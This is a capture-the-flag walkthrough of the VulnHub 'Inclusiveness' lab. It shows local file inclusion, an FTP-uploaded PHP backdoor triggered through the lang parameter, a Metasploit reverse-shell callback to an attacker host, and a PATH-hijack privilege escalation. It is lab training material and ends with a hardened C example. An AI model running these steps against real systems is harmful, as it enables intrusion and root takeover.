Inclusiveness OffSec Walkthrough

Inclusiveness OffSec Walkthrough: This is another walkthrough, for the VulnHub machine “INCLUSIVENESS: 1”, an intermediate-level lab designed by the authors “h4sh5 & Richard Lee” to give a taste of the OSCP labs. The challenge is the same as any other CTF challenge: identify the flag with the help of your pentesting skills. It is available on OffSec Play and VulnHub.

Penetration Testing Methodologies

Network Scanning

  • Netdiscover
  • nmap

Enumeration

  • robots.txt
  • User-agent restriction bypass
  • LFI

Exploiting LFI

  • LFI To RCE

Privilege Escalation

  • Abusing PATH Variable

Network Scanning

As always, we start with netdiscover to get the IP of the VM, and the host IP I found is 192.168.29.151.

netdiscover

Let’s proceed with a network scan using an Nmap aggressive scan, as given below.

nmap -p- -A 192.168.29.151

As a result, we find that port 21 is open for FTP, where anonymous login is allowed and the /pub directory is writable, and ports 80 and 22 are also accessible for HTTP and SSH respectively.

nmap scan

Enumeration

To find any loopholes we need to enumerate further, so we browse the host IP in the web browser, but unfortunately we find only the “Apache2 Debian Default Page”.

web server

Instead we check for the robots.txt file and, as a result, the message “You are not a search engine! You can’t read my robots.txt!” is shown.

search engine block

Without wasting time, I try to bypass this restriction by setting a new user agent in my Firefox using the following steps:

  • Inside the URL bar, open “about:config”
  • Then search for the preference name: useragent
  • Right-click, then > New > String

useragent firefox

You get a dialog box; enter the preference name “general.useragent.override” as shown in the image below.

useragent override

Enter the string value to set the user agent to “GoogleBot”.

google bot

Once the above steps have been completed, the record will be shown for your newly edited preference.

useragent

Now reload the /robots.txt page and you will be able to read the disallowed entry “/secret_information/” as shown below.

robots

So we explored /secret_information; it brings up a web page that describes the “DNS Zone Transfer Attack” and contains two hyperlinks, “English & Spanish.”

When I click on the “English” hyperlink, I find that it calls en.php via the lang parameter in the URL, which means there could be a possibility of LFI.

web

Therefore, I try to get the /etc/passwd file by abusing the PHP include of the web page and, as a result, I got the whole contents of the /etc/passwd file as shown in the image below.

LFI

Exploiting LFI

So, it was time to exploit the LFI vulnerability by injecting a malicious file and, as you know, the FTP service is available anonymously and /pub is a writable directory.

We then read the “vsftpd.conf” FTP config file by abusing the LFI to enumerate the writable directory path.

ftp write enable

We prepared a PHP file containing malicious code that will give us remote command execution.

upload cmd

Now it’s time to upload the malicious file “backdoor.php” to the host machine via FTP, so follow the commands below:

ftp 192.168.29.151
cd /pub
put backdoor.php
ftp

Next, we need to run the uploaded file to execute the malicious code by requesting the following URL:

http://192.168.29.151/secret_information/?lang=/var/ftp/pub/backdoor.php&cmd=id

Using the URL above, we run the backdoor.php file and at the same time run the OS command “id”, as shown in the image here.

cmd

Having achieved RCE in the installed application by abusing the LFI, we continue with Metasploit’s “web_delivery” module (target 1 is its PHP target) to compromise the host machine and obtain a reverse connection.

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.29.208
set payload php/meterpreter/reverse_tcp
exploit

This will generate malicious PHP code which you use for execution via the web URL as done above.

exploit gen

So, I copied the generated code and pasted it inside the URL to get the reverse connection from the host through the URL execution.

php rev shell

Privilege Escalation

Booom!!! We hit the goal and obtained a meterpreter session on the host machine. Since it is a boot-to-root CTF, we need to escalate to a root-privileged shell, so we try to identify all programs or files that have the SUID bit set.

So, with the help of the find command, we got a list of programs with the SUID bit set that run as the superuser, where I noticed /home/tom/rootshell.

metasploit exploit

Inside /home/tom/ I found the rootshell.c source file and a compiled binary rootshell that has SUID permissions.

According to this piece of code, the program calls the “whoami” program for validation: if the file is executed and whoami reports the user Tom, you get a privileged shell; otherwise the user ID that is currently logged in is displayed.

tom user

In simple words, the rootshell program gives a high-privilege shell if the output of the whoami program is “tom”.

You can easily take advantage of this configuration by abusing the PATH variable. Here, we create a file named “whoami” in the /tmp directory and write the following bash code to print “tom”:

cd /tmp
echo 'printf "tom"' > whoami
chmod 777 whoami

Add a temporary PATH entry with the help of the following command; you will observe that we have added /tmp to the PATH variable.

export PATH=/tmp:$PATH
echo $PATH

When all is done, run rootshell to get the root-privileged shell, just as we have obtained here, as shown below.

cd /home/tom
./rootshell
cd /root
cat flag.txt
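The PATH hijack above works because rootshell trusts the name printed by an external whoami. As an added example (not the lab's rootshell.c), this C snippet shows that check pattern next to a hardened one that asks the kernel for the caller's real uid and resets PATH before spawning anything; the function names and SAFE_PATH value are mine.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>

/* 1. The pattern the walkthrough describes: run "whoami" by its bare
 * name and trust what it prints. A relative name is resolved through
 * PATH, which the unprivileged caller of a SUID binary controls. */
int whoami_output_is_tom(const char *output) {
    char name[64];
    snprintf(name, sizeof name, "%s", output);
    name[strcspn(name, "\r\n")] = '\0';   /* strip trailing newline */
    return strcmp(name, "tom") == 0;
}

int vulnerable_check(void) {
    char buf[64] = {0};
    FILE *fp = popen("whoami", "r");      /* bare name: PATH lookup */
    if (fp == NULL) return 0;
    if (fgets(buf, sizeof buf, fp) == NULL) buf[0] = '\0';
    pclose(fp);
    return whoami_output_is_tom(buf);
}

/* 2. Hardened: ask the kernel for the real uid of the caller. In a
 * SUID binary getuid() is the invoking user, not the file owner, and
 * no external program or PATH lookup is involved. */
int uid_belongs_to(const char *user, uid_t real_uid) {
    struct passwd *pw = getpwnam(user);
    return pw != NULL && pw->pw_uid == real_uid;
}

int hardened_check(void) { return uid_belongs_to("tom", getuid()); }

/* 3. Defence in depth for any SUID program that must spawn helpers:
 * replace the inherited PATH with fixed, root-owned directories. */
static const char *SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin";
int reset_path(void) { return setenv("PATH", SAFE_PATH, 1) == 0; }

int main(void) {
    reset_path();
    printf("vulnerable check says tom: %d\n", vulnerable_check());
    printf("hardened check says tom:   %d\n", hardened_check());
    return 0;
}
```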

Finally, we have the root shell and the flag.txt file. This lab has a good combination of a basic web vulnerability and OS privilege escalation.

root flag

That completes this lab; see you in the next lab 😉
